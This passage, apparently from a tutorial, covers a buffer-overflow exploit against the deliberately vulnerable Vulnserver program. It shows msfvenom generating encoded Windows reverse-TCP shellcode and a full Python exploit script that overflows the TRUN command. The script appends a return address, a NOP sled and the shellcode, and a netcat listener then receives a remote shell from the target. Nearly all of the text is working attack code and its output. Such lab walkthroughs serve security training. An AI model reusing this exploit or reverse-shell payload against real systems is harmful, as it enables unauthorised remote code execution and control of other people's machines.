7. Generate a rootkit from metasploit msfvenom
, append it to the payload without exploding the buffer (continue)
Lets get back to our kali, we need to use msfvenom
for generating a reverse tcp shell back to our machine.
If you are curious, we can -l payloads
to list all available attacks.
root@kali:~/Desktop/exploits# msfvenom -l payloads | grep windows
cmd/windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
cmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
...
root@kali:~/Desktop/exploits# msfvenom --list f
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
Lets generate windows/shell_reverse_tcp
payload
root@kali:~/Desktop/exploits# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4"
"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54"
"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3"
"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51"
"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4"
"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65"
"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e"
"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0"
"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8"
"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab"
"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c"
"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b"
"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35"
"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4"
"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d"
"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e"
"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99"
"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56"
"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0"
"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15"
"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f"
"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7"
"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37"
"\xda\xbd\xcc\xe4\xdb\x97";
-f c
: into a C
programEXITFUNC=thread
: dont break the thread unless we exit-b \x00
: dont use bad char \x00
Lets import this exploit into our script.
exploit.py
import socket, sys
def prope(message):
"""
prope server
:param message: request message
:return: void
"""
host = "192.168.56.102"
port = 9999
res = None
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_socket.connect((host, port))
my_socket.settimeout(10) # add this to prevent freeze the connection
my_socket.recv(2048).decode()
my_socket.send(message)
res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
my_socket.close()
# hide the success , look for failure, we need crash. we need failure.
print("[success] %s:%s %s => %s" % (host, port, message, res))
except:
print("[error] %s:%s %s => None" % (host, port, len(message))) # modify the output for testing ttl length
raise
# sys.exit()
def main():
# memory address 625011af
# shell = '\x62\x50\x11\xaf'
shell = b"\xaf\x11\x50\x62"
msf = b"\xdb\xd7\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbd\xb6\x50\xf4" + \
b"\x0b\x83\xc0\x04\x31\x68\x13\x03\xde\x43\x16\xfe\xe2\x8c\x54" + \
b"\x01\x1a\x4d\x39\x8b\xff\x7c\x79\xef\x74\x2e\x49\x7b\xd8\xc3" + \
b"\x22\x29\xc8\x50\x46\xe6\xff\xd1\xed\xd0\xce\xe2\x5e\x20\x51" + \
b"\x61\x9d\x75\xb1\x58\x6e\x88\xb0\x9d\x93\x61\xe0\x76\xdf\xd4" + \
b"\x14\xf2\x95\xe4\x9f\x48\x3b\x6d\x7c\x18\x3a\x5c\xd3\x12\x65" + \
b"\x7e\xd2\xf7\x1d\x37\xcc\x14\x1b\x81\x67\xee\xd7\x10\xa1\x3e" + \
b"\x17\xbe\x8c\x8e\xea\xbe\xc9\x29\x15\xb5\x23\x4a\xa8\xce\xf0" + \
b"\x30\x76\x5a\xe2\x93\xfd\xfc\xce\x22\xd1\x9b\x85\x29\x9e\xe8" + \
b"\xc1\x2d\x21\x3c\x7a\x49\xaa\xc3\xac\xdb\xe8\xe7\x68\x87\xab" + \
b"\x86\x29\x6d\x1d\xb6\x29\xce\xc2\x12\x22\xe3\x17\x2f\x69\x6c" + \
b"\xdb\x02\x91\x6c\x73\x14\xe2\x5e\xdc\x8e\x6c\xd3\x95\x08\x6b" + \
b"\x14\x8c\xed\xe3\xeb\x2f\x0e\x2a\x28\x7b\x5e\x44\x99\x04\x35" + \
b"\x94\x26\xd1\x9a\xc4\x88\x8a\x5a\xb4\x68\x7b\x33\xde\x66\xa4" + \
b"\x23\xe1\xac\xcd\xce\x18\x27\x32\xa6\x1a\xd2\xda\xb5\x5a\x0d" + \
b"\x47\x33\xbc\x47\x67\x15\x17\xf0\x1e\x3c\xe3\x61\xde\xea\x8e" + \
b"\xa2\x54\x19\x6f\x6c\x9d\x54\x63\x19\x6d\x23\xd9\x8c\x72\x99" + \
b"\x75\x52\xe0\x46\x85\x1d\x19\xd1\xd2\x4a\xef\x28\xb6\x66\x56" + \
b"\x83\xa4\x7a\x0e\xec\x6c\xa1\xf3\xf3\x6d\x24\x4f\xd0\x7d\xf0" + \
b"\x50\x5c\x29\xac\x06\x0a\x87\x0a\xf1\xfc\x71\xc5\xae\x56\x15" + \
b"\x90\x9c\x68\x63\x9d\xc8\x1e\x8b\x2c\xa5\x66\xb4\x81\x21\x6f" + \
b"\xcd\xff\xd1\x90\x04\x44\xf1\x72\x8c\xb1\x9a\x2a\x45\x78\xc7" + \
b"\xcc\xb0\xbf\xfe\x4e\x30\x40\x05\x4e\x31\x45\x41\xc8\xaa\x37" + \
b"\xda\xbd\xcc\xe4\xdb\x97"
# shell = b"BBBB"
payload = b"TRUN ." + b"A" * 2006 + shell + b"\x90" * 16 + msf
# print(payload)
prope(payload)
print("completed test")
if __name__ == "__main__":
main()
Before injecting our shell, we need to add a few \x90
nocs to seperate the shell and memory address to prevent the poisoning issue.
Back to our kali, lets start the server and the script
root@kali:~/Desktop/exploits# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.102.
Ncat: Connection from 192.168.56.102:49602.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe
C:\Users\IEUser\Desktop\vulnserver>ls
ls
LICENSE.TXT
README.TXT
README.md
Source
essfunc.dll
vulnserver.exe
C:\Users\IEUser\Desktop\vulnserver>whoami
whoami
iewin7\ieuser
C:\Users\IEUser\Desktop\vulnserver>
Got it.
Exploited.